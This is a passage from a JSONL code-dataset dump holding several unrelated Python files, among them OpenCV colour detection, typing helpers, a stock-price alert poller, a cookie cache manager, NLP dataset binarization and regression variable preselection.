height of the image\n :param: width of the image\n :param: BGR pixel values of the color\n :return: tuple of bar, rgb values, and hsv values\n \"\"\"\n bar = np.zeros((height, width, 3), np.uint8)\n bar[:] = color\n red, green, blue = int(color[2]), int(color[1]), int(color[0])\n hsv_bar = cv2.cvtColor(bar, cv2.COLOR_BGR2HSV)\n hue, sat, val = hsv_bar[0][0]\n return bar, (red, green, blue), (hue, sat, val)\n\n\ndef sort_hsvs(hsv_list):\n \"\"\"\n Sort the list of HSV values\n :param hsv_list: List of HSV tuples\n :return: List of indexes, sorted by hue, then saturation, then value\n \"\"\"\n bars_with_indexes = []\n for index, hsv_val in enumerate(hsv_list):\n bars_with_indexes.append((index, hsv_val[0], hsv_val[1], hsv_val[2]))\n bars_with_indexes.sort(key=lambda elem: (elem[1], elem[2], elem[3]))\n return [item[0] for item in bars_with_indexes]\n\ndef find_color(hsv_val):\n \"\"\"\n Translate the HSV values to a color if it fits in a specific color range\n :param hsv_val: The HSV values\n :return: The color that the HSV value translates to.\n \"\"\"\n H = hsv_val[0]\n S = hsv_val[1]\n V = hsv_val[2]\n color = None\n \n if V<=10: color = \"Black\"\n #elif S<=10:\n # if V>30 and V<=80: color = \"Gray\"\n # elif V>=70 and V<=100: color = \"White\"\n elif H<10:\n if S>30 and V>50: color = \"Red\"\n #else: color = \"White\"\n elif H>=10 and H<30:\n if H>=20 and H<30:\n if S>=10: color = \"Orange\"\n if S>=10 and S<20:\n if V>=50: color = \"Brown\"\n elif S>60 and S<=70: color = \"Orange\"\n elif S>=40:\n if V>=40 and V<=70: color = \"Brown\"\n else: color = \"Orange\"\n elif H>=30 and H<=50:\n if S<=20 and V<=60: color = \"Gray\"\n elif S>=30 and V>=50: color = \"Brown\"\n if S>15:\n if V>60: color = \"White\"\n if S>= 80:\n if V >= 90: color = \"Orange\"\n elif V <= 80: color = \"Brown\"\n elif S>=40 and S<=60:\n if V>=80: color = \"Purple\"\n else:\n if V>=70: color = \"White\"\n elif H>50 and H<=60:\n if S <= 20:\n if V>=20 and V<90: color = \"Gray\"\n elif V>=90: color = \"White\"\n if S>=50:\n if V>=50 and V<90: color = \"Yellow\"\n elif V>=90: color = \"White\"\n #skipping H between 60 and 100, colors look like grass\n elif H>=100 and H<=150:\n if S>50 and V>50: color = \"Green\"\n elif H>160 and H<200:\n if S>=25 and V>=30: color = \"Blue\"\n else: color = \"Gray\"\n elif H>=200 and H<=250:\n if S<=10:\n if V>=70: color = \"White\"\n if S>=30:\n if V>=30: color = \"Blue\"\n elif H>250 and H<=340:\n if S>=15:\n if V>=30: color = \"Purple\"\n elif S>=20: color = \"Brown\"\n elif H>340 and H<=360:\n if S>=20 and V>=50: color = \"Red\"\n return color\n\n# Main code starts here\ndef main(filename):\n #reads image and gets image pixel shape\n \n #filename = directory + '\\DSC_' + str(index) + '.jpg'\n# filename = r'C:\\Users\\UHDT\\Pictures\\Test Targets' + '/DSC_0' + str(index) + '.jpg'\n img = cv2.imread(filename)\n height, width, _ = np.shape(img)\n\n #Crops images to get the center plus and minus 25 pixels from center\n width_center = width/2\n height_center = height/2\n\n# if(shape == \"star\"):\n# startingX = int(width_center -60)\n# startingY = int(height_center - 60)\n# endingX = int(width_center + 60)\n# endingY = int(height_center + 60)\n# elif(shape == \"cross\"):\n# startingX = int(width_center -50)\n# startingY = int(height_center - 50)\n# endingX = int(width_center + 50)\n# endingY = int(height_center + 50)\n\n startingX = int(width_center - 60)\n startingY = int(height_center - 65)\n\n endingX = int(width_center + 60)\n endingY = int(height_center + 60)\n\n crop_img = img[startingX:endingX, startingY:endingY]\n\n\n #Shows cropped image\n #cv2.imshow('crop_img', crop_img)\n\n # reshape the image to be a simple list of RGB pixels\n image = crop_img.reshape((-1, 3))\n\n # Gets the two most dominant colors\n num_clusters = 2\n clusters = KMeans(n_clusters=num_clusters)\n clusters.fit(image)\n\n # count the dominant colors and put them in \"buckets\"\n histogram = make_histogram(clusters)\n # then sort them, most-common first\n combined = zip(histogram, clusters.cluster_centers_)\n combined = sorted(combined, key=lambda x: x[0], reverse=True)\n\n #sprint(*combined)\n # finally, we'll output a graphic showing the colors in order\n bars = []\n hsv_values = []\n rgb_values = []\n for index, rows in enumerate(combined):\n bar, rgb, hsv = make_bar(100, 100, rows[1])\n\n #prints RGB values\n # print(f'Bar {index + 1}')\n # print(f' RGB values: {rgb}')\n #print(hsv)\n # print(*rgb)\n #HSV values then need to be multiplied by (2, 1/2.55, 1/2.55)\n # print(*hsv)\n # print(f' HSV values: {hsv}')\n hsv_values.append(hsv)\n bars.append(bar)\n\n #print(hsv_values[0])\n #print(hsv_values[1])\n\n #Gets the color for the shape color\n dominant_color = [0] * 3\n dominant_color[0] = hsv_values[0][0] * 2\n dominant_color[1] = hsv_values[0][1] / 2.55\n dominant_color[2] = hsv_values[0][2] / 2.55\n print(dominant_color)\n shape_color = find_color(dominant_color)\n print(\"Primary color = \",shape_color)\n\n #Gets the color of alpahnumeric color\n secondary_color = [0] * 3\n secondary_color[0] = hsv_values[1][0] * 2\n secondary_color[1] = hsv_values[1][1] / 2.55\n secondary_color[2] = hsv_values[1][2] / 2.55\n print(secondary_color)\n alpha_color = find_color(secondary_color)\n print(\"Secondary color = \", alpha_color)\n\n\n # sort the bars[] list so that we can show the colored boxes sorted\n # by their HSV values -- sort by hue, then saturation\n sorted_bar_indexes = sort_hsvs(hsv_values)\n sorted_bars = [bars[idx] for idx in sorted_bar_indexes]\n\n #cv2.imshow('Sorted by HSV values', np.hstack(sorted_bars))\n #cv2.imshow(f'{num_clusters} Most Common Colors', np.hstack(bars))\n #cv2.waitKey(0)\n print(\"\\n\")\n \n colors = {\n \"shape_color\": shape_color,\n \"alphanumeric_color\": alpha_color\n }\n\n return colors\n\n#start and ending indices\n# start = 3358\n# end = 3367\n\n# #change directory accordingly\n# directory = r\"C:\\Users\\UHDT\\Pictures\\Test Targets\"\n# main(3358, directory)\n#while(start <= end):\n# main(start, directory)\n# start += 1\n\n#while start <= end:\n# if(start < 10): index = \"00\" + str(start)\n# elif(start < 100): index = \"0\" + str(start)\n# else: index = str(start)\n# main(index, directory)\n# start += 1","sub_path":"detection_scripts/openCVcolor1.py","file_name":"openCVcolor1.py","file_ext":"py","file_size_in_byte":7369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"375515522","text":"import typing\n\nfrom typish._types import Unknown\n\n\ndef subclass_of(cls: type, *args: type) -> bool:\n \"\"\"\n Return whether ``cls`` is a subclass of all types in ``args`` while also\n considering generics.\n :param cls: the subject.\n :param args: the super types.\n :return: True if ``cls`` is a subclass of all types in ``args`` while also\n considering generics.\n \"\"\"\n from typish.classes._literal import LiteralAlias\n\n if args and issubclass(args[0], LiteralAlias):\n return _check_literal(cls, subclass_of, *args)\n\n if len(args) > 1:\n result = subclass_of(cls, args[0]) and subclass_of(cls, *args[1:])\n else:\n if args[0] == cls:\n return True\n result = _subclass_of(cls, args[0])\n return result\n\n\ndef _subclass_of(cls: type, clsinfo: type) -> bool:\n from typish.functions._get_origin import get_origin\n from typish.functions._get_args import get_args\n\n # Check whether cls is a subtype of clsinfo.\n clsinfo_origin = get_origin(clsinfo)\n clsinfo_args = get_args(clsinfo)\n cls_origin = get_origin(cls)\n if cls is Unknown or clsinfo in (typing.Any, object):\n result = True\n elif cls_origin is typing.Union:\n # cls is a Union; all options of that Union must subclass clsinfo.\n cls_args = get_args(cls)\n result = all([subclass_of(elem, clsinfo) for elem in cls_args])\n elif clsinfo_args:\n result = _subclass_of_generic(cls, clsinfo_origin, clsinfo_args)\n else:\n try:\n result = issubclass(cls_origin, clsinfo_origin)\n except TypeError:\n result = False\n return result\n\n\ndef _subclass_of_union(\n cls: type,\n info_args: typing.Tuple[type, ...]) -> bool:\n # Handle subclass_of(*, union)\n result = True\n for cls_ in info_args:\n if subclass_of(cls, cls_):\n break\n else:\n result = False\n return result\n\n\ndef _subclass_of_generic(\n cls: type,\n info_generic_type: type,\n info_args: typing.Tuple[type, ...]) -> bool:\n # Check if cls is a subtype of info_generic_type, knowing that the latter\n # is a generic type.\n\n from typish.functions._get_origin import get_origin\n from typish.functions._get_args import get_args\n\n result = False\n\n cls_origin = get_origin(cls)\n cls_args = get_args(cls)\n if info_generic_type is tuple:\n # Special case.\n result = (subclass_of(cls_origin, tuple)\n and _subclass_of_tuple(cls_args, info_args))\n elif cls_origin is tuple and info_generic_type is typing.Iterable:\n # Another special case.\n args = cls_args\n if len(args) > 1 and args[1] is ...:\n args = [args[0]]\n\n # Match the number of arguments of info to that of cls.\n matched_info_args = info_args * len(args)\n result = _subclass_of_tuple(args, matched_info_args)\n elif info_generic_type is typing.Union:\n # Another special case.\n result = _subclass_of_union(cls, info_args)\n elif (subclass_of(cls_origin, info_generic_type) and cls_args\n and len(cls_args) == len(info_args)):\n for tup in zip(cls_args, info_args):\n if not subclass_of(*tup):\n result = False\n break\n else:\n result = True\n # Note that issubtype(list, List[...]) is always False.\n # Note that the number of arguments must be equal.\n return result\n\n\ndef _subclass_of_tuple(\n cls_args: typing.Tuple[type, ...],\n info_args: typing.Tuple[type, ...]) -> bool:\n from typish.functions._get_origin import get_origin\n from typish.functions._common_ancestor import common_ancestor_of_types\n\n result = False\n if len(info_args) == 2 and info_args[1] is ...:\n type_ = get_origin(info_args[0])\n if type_ is typing.Union:\n # A heterogeneous tuple: check each element if it subclasses the\n # union.\n result = all([subclass_of(elem, info_args[0]) for elem in cls_args])\n else:\n result = subclass_of(common_ancestor_of_types(*cls_args), info_args[0])\n elif len(cls_args) == len(info_args):\n for c1, c2 in zip(cls_args, info_args):\n if not subclass_of(c1, c2):\n break\n else:\n result = True\n return result\n\n\ndef _check_literal(obj: object, func: typing.Callable, *args: type) -> bool:\n # Instance or subclass check for Literal.\n literal = args[0]\n leftovers = args[1:]\n literal_args = getattr(literal, '__args__', None)\n if literal_args:\n literal_arg = literal_args[0]\n return obj == literal_arg and (not leftovers or func(obj, *leftovers))\n return False\n","sub_path":"Aula 10/Vendas/venv/Lib/site-packages/typish/functions/_subclass_of.py","file_name":"_subclass_of.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"145272095","text":"import vgg_intermediate\nimport torch.nn.functional as F\nimport torch.nn as nn\n\n\nclass ContentLoss(nn.Module):\n def __init__(self, content_image, layers):\n super(ContentLoss, self).__init__()\n self.vgg = vgg_intermediate.VGGIntermediate(requested=layers)\n target_features = self.vgg(content_image)\n self.target = target_features[19].detach()\n \n def forward(self, input):\n out = self.vgg(input)\n mse = 0\n self.loss = F.mse_loss(out[19], self.target)\n return self.loss","sub_path":"style_transfer/content_loss.py","file_name":"content_loss.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"480702388","text":"import win32api\nimport win32con\nimport os\nimport time\n\nclass win32Doc:\n _public_methods_ = ['write']\n def write(self,s):\n print(s)\n\nimport urllib\nimport urllib.error\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport gzip\nimport lxml\nimport sys\n\nclass login_web:\n\n eleName = [\"股票名字\",\"今日开盘价\",\"昨日收盘价\",\"当前价格\",\"今日最高价\",\"今日最低价\",\"竞买价\",\\\n\"竞卖价\",\"成交的股票数\",\"成交金额\",\"买一n\",\"买一p\",\"买二n\",\"买二p\",\"买三n\",\"买三p\",\"买四n\",\\\n\"买四p\",\"买五n\",\"买五p\",\"卖一n\",\"卖一p\",\"卖二n\",\"卖二p\",\"卖三n,\",\"卖三p\",\"卖四n\",\"卖四p\",\"卖五n\",\"卖五p\",\"日期\",\"时间\"]\n\n def __init__(self):\n '''设置头,cookie'''\n self.players = []\n self.opener = urllib.request.build_opener()\n user_agent = \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101\"\n accept = \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\"\n connection = \"keep-alive\"\n host = \"10.189.37.35:7100\"\n upgrade = \"1\"\n headers = {'User-Agent': user_agent,\n 'Accept': accept,\n 'Connection': connection,\n 'Host': host,\n 'Upgrade-Insecure-Requests': upgrade,\n }\n header = []\n for key, value in headers.items():\n elem = (key, value)\n header.append(elem)\n print(header)\n self.opener.addheaders = header\n\n def ungzip(self, data):\n try: # 尝试解压\n data = gzip.decompress(data).decode()\n except:\n print('未经压缩, 无需解压')\n return data\n\n def getInfo(self,id):\n '''从people页面获得第一批用户信息,通过扫描关注列表,得到大量用户信息'''\n url = \"http://hq.sinajs.cn/list=\" + id\n try:\n request = urllib.request.Request(url)\n response = self.opener.open(url)\n html = response.read().decode('gb2312')\n #html = self.ungzip(html)\n #print(html)\n self.dealInfo(html)\n #soup = BeautifulSoup(html, 'lxml')\n except urllib.error.URLError as e:\n print(e.reason)\n print(\"有错误\")\n if hasattr(e, \"code\"):\n print(e.code)\n if hasattr(e, \"reason\"):\n print(e.reason)\n\n def dealInfo(self,info):\n if info:\n element = info.split(',')\n self.dic = {}\n i = 0\n for each in self.eleName:\n self.dic [each] = element[i]\n i += 1\n self.dic['股票名字'] = self.dic ['股票名字'].split('\"')[1]\nid = input(\"please input a number\\n\")\nhi_price = float(input(\"请输入你想要提醒的上限价格\\n\"))\nlo_price = float(input(\"请输入你想要提醒的下限价格\\n\"))\nlg = login_web()\nwhile True:\n lg.getInfo(id)\n print(lg.dic['股票名字']+':'+lg.dic['时间']+' : ' + lg.dic['当前价格'])\n if float(lg.dic['当前价格']) >= hi_price or float(lg.dic['当前价格']<=lo_price):\n win32api.MessageBox(0, str(lg.dic['当前价格'])+'价格已达到', \"注意啦\", win32con.MB_ICONWARNING)\n break\n time.sleep(5)\n\n","sub_path":"stockInfo.py","file_name":"stockInfo.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"159944515","text":"from Cookie import SimpleCookie\nfrom datetime import datetime\nimport re\nfrom urlparse import urlparse\n\n\nDEFAULT_COOKIE_KEY_PREFIX = 'cookie'\nORIGIN_COOKIE_KEY_PREFIX = 'origin'\nDEFAULT_COOKIE_MAX_AGE = 60 * 60 * 24 * 365 * 10 # 10 years\n\n\ndef _make_cookie(cookie_headers):\n def _add_dash(match_obj):\n return match_obj.group(0).replace(' ', '-')\n\n cookie = SimpleCookie()\n set_cookie_str = re.sub(r'\\d{2}\\s\\w+\\s\\d{4}', _add_dash, cookie_headers)\n cookie.load(set_cookie_str)\n\n return cookie\n\ndef get_max_age(cookie):\n max_age = None\n # convert expires to seconds, so we use take advantage of cache expiry feature,\n # no need to clear cookie ourselves\n if cookie['expires']:\n fmt = '%a, %d-%b-%Y %H:%M:%S GMT'\n try:\n expired = datetime.strptime(cookie['expires'], fmt)\n now = datetime.utcnow()\n max_age = (expired - now).total_seconds()\n except ValueError:\n # if cookie has wrong date format we ignore the expires\n cookie['expires'] = ''\n max_age = None\n\n # max-age has higher priority than expires\n if cookie['max-age']:\n max_age = int(cookie['max-age'])\n return max_age if max_age is not None else DEFAULT_COOKIE_MAX_AGE\n\ndef is_domain_valid(domain):\n if domain.endswith('.'):\n return False\n else:\n return True\n\ndef normalize_domain(domain):\n return domain.lstrip('.')\n\n# Not used\n#def normalize_path(path):\n# return path.rstip('/') if path != '/' else path\n\n\nclass CookieManager(object):\n\n def __init__(self, cache, key_prefix=''):\n self.key_prefix = '.'.join([key_prefix, DEFAULT_COOKIE_KEY_PREFIX])\n self.cache = cache\n\n def process_request(self, request):\n \"\"\"\n Set 'Cookie' header in request\n \"\"\"\n if self.cache is None:\n return\n\n for key, value in self.get_cookies(request.url).items():\n request.cookies.setdefault(key, value)\n\n def process_response(self, request, response):\n \"\"\"\n Process 'Set-Cookie' header in response\n \"\"\"\n if self.cache is None:\n return\n\n if response and response.has_header('Set-Cookie'):\n origin = urlparse(response.url).netloc\n cookies = _make_cookie(response.headers['Set-Cookie'])\n for name, cookie in cookies.items():\n domain = cookie['domain']\n if not domain:\n self.set_origin_cookie(origin, cookie)\n else:\n self.set_domain_cookie(cookie)\n\n def get_domain_cookie_key(self, domain, path, name):\n return '.'.join([self.key_prefix, normalize_domain(domain), path, name])\n\n def get_domain_cookie_lookup_key(self, domain):\n return '.'.join([self.key_prefix, normalize_domain(domain)])\n\n def get_origin_cookie_key(self, origin, path, name):\n return '.'.join([self.key_prefix, ORIGIN_COOKIE_KEY_PREFIX, normalize_domain(origin), path, name])\n\n def get_origin_cookie_lookup_key(self, origin):\n return '.'.join([self.key_prefix, ORIGIN_COOKIE_KEY_PREFIX, normalize_domain(origin)])\n\n def get_cookies(self, url):\n \"\"\"\n Return a dictionary (key:value) of cookies for the given URL\n \"\"\"\n domain = urlparse(url).netloc\n domain_parts = domain.split('.')\n path = urlparse(url).path\n cookies = self.get_origin_cookies(domain, path)\n for i in reversed(range(len(domain_parts))):\n d = '.'.join(domain_parts[i:])\n c = self.get_domain_cookies(d, path)\n cookies.update(c)\n return cookies\n\n def get_domain_cookies(self, domain, path):\n \"\"\"\n Return a dictionary (key:value) of domain cookies\n \"\"\"\n return self.get_xxx_cookies(self.get_domain_cookie_lookup_key, domain, path)\n\n def get_origin_cookies(self, domain, path):\n \"\"\"\n Return a dictionary (key:value) of origin cookies\n \"\"\"\n return self.get_xxx_cookies(self.get_origin_cookie_lookup_key, domain, path)\n\n def get_xxx_cookies(self, get_lookup_key_fn, domain, path):\n \"\"\"\n Return a dictionary (key:value) of xxx cookies\n \"\"\"\n lookup_key = get_lookup_key_fn(domain)\n cookie_keys_set = self.cache.get(lookup_key) or set()\n cookies = {}\n expired_cookie_keys_set = set()\n if cookie_keys_set:\n for cookie_key in cookie_keys_set:\n cookie = self.cache.get(cookie_key)\n if cookie:\n if self._path_ok(cookie, path):\n cookies[cookie.key] = cookie.value\n else:\n expired_cookie_keys_set.add(cookie_key)\n self.cache.set(lookup_key, cookie_keys_set.difference(expired_cookie_keys_set))\n return cookies\n\n def _path_ok(self, cookie, url):\n if not cookie['path']:\n return True\n\n if cookie['path'] and cookie['path'] == '/':\n return True\n request_path = urlparse(url).path\n\n # This never happens in real system. request_path always starts with /.\n# if not request_path.startswith('/'):\n# request_path = '/' + request_path\n\n if request_path == cookie['path']:\n return True\n elif cookie['path'].endswith('/') and request_path.startswith(cookie['path'][:-1]):\n return True\n elif request_path.startswith(cookie['path']) and request_path[len(cookie['path'])] == '/':\n return True\n else:\n return False\n\n def set_domain_cookie(self, cookie):\n \"\"\"\n Set domain cookie (i.e. cookie that has Domain attribute) in cache.\n \"\"\"\n domain = cookie['domain']\n if not is_domain_valid(domain):\n return\n\n max_age = get_max_age(cookie)\n name = cookie.key\n path = cookie['path']\n\n cookie_key = self.get_domain_cookie_key(domain, path, name)\n lookup_key = self.get_domain_cookie_lookup_key(domain)\n self.cache.set(cookie_key, cookie, max_age)\n\n cookie_keys_set = self.cache.get(lookup_key) or set()\n cookie_keys_set.add(cookie_key)\n self.cache.set(lookup_key, cookie_keys_set, DEFAULT_COOKIE_MAX_AGE)\n\n def set_origin_cookie(self, origin, cookie):\n \"\"\"\n Set origin cookie (i.e. cookie that does not have Domain attribute) in cache.\n \"\"\"\n max_age = get_max_age(cookie)\n name = cookie.key\n path = cookie['path']\n\n cookie_key = self.get_origin_cookie_key(origin, path, name)\n lookup_key = self.get_origin_cookie_lookup_key(origin)\n self.cache.set(cookie_key, cookie, max_age)\n\n cookie_keys_set = self.cache.get(lookup_key) or set()\n cookie_keys_set.add(cookie_key)\n self.cache.set(lookup_key, cookie_keys_set, DEFAULT_COOKIE_MAX_AGE)","sub_path":"dogbutler/cookie.py","file_name":"cookie.py","file_ext":"py","file_size_in_byte":6901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"418455233","text":"from typing import Dict\nimport os\nimport shutil\nfrom multiprocessing import Pool\nfrom ncc import tasks\nfrom collections import Counter\nfrom ncc.data import (\n Dictionary,\n indexed_dataset,\n)\nfrom ncc.tokenizers import tokenization\nfrom ncc.data.tools.binarizer import Binarizer\nfrom ncc.utils.file_ops.yaml_io import load_yaml\nfrom ncc import LOGGER\n\nfrom ncc.utils.file_ops import json_io\n\n\ndef binarize(args: Dict, filename: str, dict: Dictionary, in_file: str,\n offset: int, end: int, append_eos: bool = True):\n \"\"\"binarize function for multi-processing\"\"\"\n ds_file = '{}.mmap'.format(in_file)\n ds = indexed_dataset.make_builder(ds_file, impl=args['preprocess']['dataset_impl'], vocab_size=len(dict))\n\n def consumer(tensor):\n ds.add_item(tensor)\n\n res = Binarizer.binarize(filename, dict, consumer, tokenize=tokenization.json_tokenizer,\n append_eos=append_eos, offset=offset, end=end)\n ds.finalize('{}.idx'.format(in_file))\n return res\n\n\ndef main(args):\n task = tasks.get_task(args['preprocess']['task'])\n LOGGER.info('mkdir {} for {} task'.format(args['preprocess']['destdir'], args['preprocess']['task']))\n os.makedirs(args['preprocess']['destdir'], exist_ok=True)\n\n def train_path(lang):\n return \"{}{}\".format(args['preprocess']['trainpref'], (\".\" + lang) if lang else \"\")\n\n def valid_path(lang):\n return \"{}{}\".format(args['preprocess']['validpref'], (\".\" + lang) if lang else \"\")\n\n def file_name(prefix, lang):\n fname = prefix\n if lang is not None:\n fname += \".{lang}\".format(lang=lang)\n return fname\n\n def dest_path(prefix, lang):\n return os.path.join(args['preprocess']['destdir'], file_name(prefix, lang))\n\n def dict_path(lang):\n return dest_path(lang, \"dict\") + \".jsonl\"\n\n target = not args['preprocess']['only_source']\n\n from dataset.codexglue.code_to_text import BPE_DIR\n\n source_dict_file = os.path.join(BPE_DIR, 'csn/csn.spm.vocab')\n target_dict_file = os.path.join(os.path.dirname(args['preprocess']['destdir']), 'dict.jsonl')\n with open(source_dict_file, 'r') as reader, open(target_dict_file, 'w') as writer:\n for line in reader:\n print(json_io.json_dumps([line.split('\\t')[0], 100]), file=writer)\n src_dict = tgt_dict = task.load_dictionary(target_dict_file)\n\n src_dict.save(dict_path(args['preprocess']['source_lang'])) # save spm dict to ncc.dictionary\n if target and tgt_dict is not None:\n tgt_dict.save(dict_path(args['preprocess']['target_lang']))\n\n # 2. ***************build dataset********************\n def make_binary_dataset(vocab: Dictionary, input_file, output_file, num_workers: int):\n \"\"\"make binary dataset\"\"\"\n # LOGGER.info(\"[{}] Dictionary: {} types\".format(attr, len(vocab) - 1))\n n_seq_tok = [0, 0]\n replaced = Counter() # save un-recorded tokens\n\n def merge_result(worker_result):\n replaced.update(worker_result[\"replaced\"])\n n_seq_tok[0] += worker_result[\"nseq\"]\n n_seq_tok[1] += worker_result[\"ntok\"]\n\n # split a file into different parts\n # if use multi-processing, we first process 2nd to last file\n # 1.txt -> 10 processor, 0(p0)(0-99), 100(p1)(100-199), ...\n offsets = Binarizer.find_offsets(input_file, num_workers)\n pool = None\n if num_workers > 1:\n # p1-pN -> (1 bin-txt, 1 idx), (N bin-txt, N idx)\n pool = Pool(processes=num_workers - 1)\n for worker_id in range(1, num_workers):\n prefix = \"{}{}\".format(output_file, worker_id)\n pool.apply_async(\n binarize,\n (\n args,\n input_file,\n vocab,\n prefix,\n offsets[worker_id],\n offsets[worker_id + 1]\n ),\n callback=merge_result\n )\n pool.close()\n # process 1th file, if multi-processing available. If not, process all file\n # p0 -> 0,end\n ds_file = '{}.mmap'.format(output_file)\n ds = indexed_dataset.make_builder(ds_file, impl=args['preprocess']['dataset_impl'], vocab_size=len(vocab))\n merge_result(\n Binarizer.binarize(\n input_file, vocab, lambda t: ds.add_item(t),\n tokenize=tokenization.json_tokenizer, offset=0, end=offsets[1], append_eos=True,\n )\n )\n if num_workers > 1:\n # p1-pN\n pool.join()\n # merge sub-processors' index and data files into final files and delete them.\n for worker_id in range(1, num_workers):\n temp_file_path = \"{}{}\".format(output_file, worker_id)\n ds.merge_file_(temp_file_path)\n # idx, txt\n os.remove(indexed_dataset.data_file_path(temp_file_path))\n os.remove(indexed_dataset.index_file_path(temp_file_path))\n ds.finalize('{}.idx'.format(output_file))\n\n LOGGER.info(\n \"{}: {} sents, {} tokens, {:.3}% replaced by {}\".format(\n # attr,\n input_file,\n n_seq_tok[0],\n n_seq_tok[1],\n 100 * sum(replaced.values()) / n_seq_tok[1],\n vocab.unk_word,\n )\n )\n\n def make_dataset(vocab, input_prefix, output_prefix, lang, num_workers=1):\n if args['preprocess']['dataset_impl'] == \"raw\":\n in_file = file_name(input_prefix, lang)\n out_dir = args['preprocess']['destdir']\n os.makedirs(out_dir, exist_ok=True)\n LOGGER.info('Copying {} into {}'.format(in_file, out_dir))\n shutil.copy(src=in_file, dst=args['preprocess']['destdir'])\n else:\n in_file = file_name(input_prefix, lang)\n out_file = dest_path(output_prefix, lang)\n os.makedirs(os.path.dirname(out_file), exist_ok=True)\n make_binary_dataset(vocab, in_file, out_file, num_workers)\n\n def make_all(lang, vocab):\n if args['preprocess']['trainpref']:\n make_dataset(vocab, args['preprocess']['trainpref'], \"train\", lang,\n num_workers=args['preprocess']['workers'])\n if args['preprocess']['validpref']:\n for k, validpref in enumerate(args['preprocess']['validpref'].split(\",\")):\n outprefix = \"valid{}\".format(k) if k > 0 else \"valid\"\n make_dataset(vocab, validpref, outprefix, lang, num_workers=args['preprocess']['workers'])\n if args['preprocess']['testpref']:\n for k, testpref in enumerate(args['preprocess']['testpref'].split(\",\")):\n outprefix = \"test{}\".format(k) if k > 0 else \"test\"\n make_dataset(vocab, testpref, outprefix, lang, num_workers=args['preprocess']['workers'])\n\n make_all(args['preprocess']['source_lang'], src_dict)\n if target:\n make_all(args['preprocess']['target_lang'], tgt_dict)\n\n\ndef cli_main():\n import argparse\n parser = argparse.ArgumentParser(\n description=\"Downloading/Decompressing CodeSearchNet dataset(s) or Tree-Sitter Library(ies)\")\n parser.add_argument(\n \"--yaml_file\", \"-f\", type=str, help=\"load {yaml_file}.yml for train\",\n default='config/ruby'\n )\n args = parser.parse_args()\n LOGGER.info(args)\n yaml_file = os.path.join(os.path.dirname(__file__), '{}.yml'.format(args.yaml_file))\n LOGGER.info('Load arguments in {}'.format(yaml_file))\n args = load_yaml(yaml_file)\n LOGGER.info(args)\n main(args)\n\n\nif __name__ == \"__main__\":\n cli_main()\n","sub_path":"dataset/codexglue/code_to_text/codebart/preprocess_codebart.py","file_name":"preprocess_codebart.py","file_ext":"py","file_size_in_byte":7735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"32825827","text":"#! /usr/bin/env python\n\nimport numpy as np\nimport pandas as pd\nfrom pandas import DataFrame, Series\nimport time\nimport sys\nimport os\nimport math\nfrom LogProc import *\nsys.path.append(r'/Users/shenzhouyang/mycode/数据测试/code/LR/libraries')\nfrom varclushi import VarClusHi\nimport statsmodels.api as sm\n\ndef preselection(df, modeling_weight, var_clus_cat, target_var, var_info_df, forced_var_list, exclude_var_list, min_iv, max_iv, preselect_var_num, tgt_dr):\n\tlog_file, lst_file = AppendLogs()\n\tfor x in log_file, lst_file:\n\t\tprint('\\n', file = x)\n\t\n\t\n\tvar_info_df['force_ind'] = var_info_df.apply(var_check, axis = 1, check_lst = forced_var_list)\n\tvar_info_df['exclude_ind'] = var_info_df.apply(var_check, axis = 1, check_lst = exclude_var_list)\n\t\n\tvar_candidate_df = var_info_df[(var_info_df['force_ind'] == 0) & (var_info_df['exclude_ind'] == 0)]\n\t\n\t\n\t#VarClus Selection\n\tclustering_sel_var_df = varclus(df_in = df, var_df = var_candidate_df, var_clus_cat = var_clus_cat)\n\tclustering_sel_var_df.to_csv(tgt_dr + '/varclus_selected_vars.csv', index = False)\n\tprint('{0} variables after clustering.'.format(len(clustering_sel_var_df)), file = log_file)\n\t\n\t#Backward Selection\n\t#clustering_sel_var_df = pd.read_csv(tgt_dr + '/varclus_selected_vars.csv')\n\tvar_lst = list(clustering_sel_var_df['woe'])\n\t\n\tvar_lst_preselection = lr_backward(df, target_var, var_lst, preselect_var_num, log = log_file, lst = lst_file)\n\tprint('{0} variables after backward.'.format(len(var_lst_preselection)), file = log_file)\n\t\n\t#Retrieve forced variables\n\tvar_lst_preselection += list(var_info_df[var_info_df['force_ind'] == 1]['woe'])\n\t\n\tvar_info_df[var_info_df['woe'].isin(var_lst_preselection)].to_csv(tgt_dr + '/preselected_vars.csv', index = False)\n\t\n\t\ndef lr_backward(df_in, target_var, candidate_var_lst, var_cnt_max, **kargs):\n\tcurrent_var_lst = candidate_var_lst.copy()\n\tstep = 1\n\twhile len(current_var_lst) > var_cnt_max:\n\t\tprint('Step {0}, {1} variables in total(target is {2})'.format(step, len(current_var_lst), var_cnt_max), file = kargs['log'])\n\t\tX = df_in[current_var_lst]\n\t\tX.insert(0, 'Intercept', 1)\n\t\tmodel = sm.OLS(df_in[[target_var]], X).fit()\n\t\tprint('Step {0}:'.format(step), file = kargs['lst'])\n\t\tprint(model.summary(), file = kargs['lst'])\n\t\t# use all coefs except intercept\n\t\tpv_series = model.pvalues.iloc[1:]\n\t\tpv_series.sort_values(ascending = False, inplace = True)\n\t\tcurrent_var_lst.remove(pv_series.index[0])\n\t\tfor f in kargs.values():\n\t\t\tprint('\\n{0} (p-value: {1}) is removed.\\n'.format(pv_series.index[0], pv_series[0]), file = f)\n\t\tstep += 1\n\t\n\treturn current_var_lst\n\t\t\n\ndef top(df, n, column):\n\treturn df.sort_values(by = column, ascending = False)[:n]\n\ndef var_check(df, check_lst):\n\n\tif df['varname'] in check_lst or df['woe'] in check_lst:\n\t\treturn 1\n\telse:\n\t\treturn 0\n\t\t\n\ndef varclus(df_in, var_df, var_clus_cat):\n\t\n\tclustering_sel_var_df = 